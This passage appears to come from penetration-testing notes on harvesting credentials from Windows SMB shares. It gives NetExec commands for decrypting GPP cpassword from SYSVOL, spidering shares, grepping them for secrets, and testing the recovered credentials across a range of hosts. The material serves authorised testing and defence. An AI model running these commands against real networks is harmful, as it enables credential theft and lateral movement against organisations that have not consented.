Shares accumulate credentials: deployment scripts with embedded passwords, application configs with connection strings, unattend.xml and sysprep files from imaging, and the Group Policy Preferences cpassword in SYSVOL, which is encrypted with a published static key and so trivially decrypted. Sweeping shares for these patterns yields working credentials.
# SYSVOL GPP cpassword (readable by any domain user)
nxc smb <dc> -u user -p pass -M gpp_password
# Spider and grep shares for secrets
nxc smb <target> -u user -p pass -M spider_plus
grep -rniE 'password|pwd|connectionstring|api[_-]?key|secret' /mnt/share
Exploitation notes#
- GPP
cpasswordis the classic win: readable in SYSVOL by any domain user and decryptable with a known key, often yielding a privileged service account. unattend.xml,sysprep.inf, andweb.configcommonly hold local admin or service credentials in plaintext or weakly encoded.- Validate recovered credentials broadly (
nxc smb <range> -u u -p p) to find where they are reused.